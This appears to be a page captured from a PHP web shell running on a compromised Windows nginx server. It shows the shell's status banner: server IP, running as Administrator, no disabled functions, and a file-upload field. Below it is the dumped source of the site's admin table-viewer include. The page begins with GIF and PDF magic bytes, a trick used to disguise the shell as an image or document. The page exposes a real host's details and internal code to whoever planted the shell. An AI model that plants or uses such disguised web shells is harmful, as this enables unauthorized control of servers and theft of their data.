GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/admin/_info/ |
Upload File : |
<? // admin/_info/infoData.phpinc t_Begin(); // Begin TRACKing included file. $fieldQuery="SHOW COLUMNS FROM `".$f['table']."`"; $fieldResult = query_do($fieldQuery,$f['database']); $fieldCount = $GLOBALS['_QUERY']['count']; $query="SELECT * FROM `".$f['table']."`"; $dataResult = query_do($query,$f['database']); $dataCount = $GLOBALS['_QUERY']['count']; ?> <style type="text/css"> table.data { border-top:1px solid silver; border-left:1px solid silver; } td.data, th.data { border-bottom:1px solid silver; border-right:1px solid silver; padding-left:2px; padding-right:2px; text-align:left; } </style> <table cellpadding="0" cellspacing="0"><tr><td> <table><tr><td><fieldset><legend><?=$f['database']?> <?=$f['table']?> Data (<?=$dataCount?> records)</legend> <table cellpadding="1" cellspacing="0" class="data"> <tr> <? query_seek($fieldResult, 0); while ($fieldInfo = query_row($fieldResult)) { ?> <th class="info_info data"><?=$fieldInfo['Field']?></th> <? } ?> </tr> <? $divCount = 0; if ($dataCount) { query_seek($dataResult, 0); while ($dataInfo = query_row($dataResult)) { ?> <tr> <? query_seek($fieldResult, 0); while ($fieldInfo = query_row($fieldResult)) { if ( stripos($fieldInfo['Field'],"password") !== false || strpos($fieldInfo['Field'],"pw") !== false || strpos($fieldInfo['Field'],"PW") !== false ) { ?> <td class="data"><?=str_repeat("*", strlen($fieldInfo['Field']))?></td> <? } else { if ( strlen($dataInfo[$fieldInfo['Field']]) <= 30 ) { ?> <td class="data"><?=htmlSafe($dataInfo[$fieldInfo['Field']])?></td> <? } else { // In div. ?> <td class="data"><?=info_Div(htmlSafe(substr($dataInfo[$fieldInfo['Field']],0,27)),htmlSafe($dataInfo[$fieldInfo['Field']]))?></td> <? } } } ?> </tr> <? } } else { ?> <tr><td colspan="<?=$fieldCount?>" class="bold_info center_info error_info">No data in table</td> </tr> <? } ?> </table> </fieldset></td></tr></table> <? t_End(); // End TRACKing included file. ?>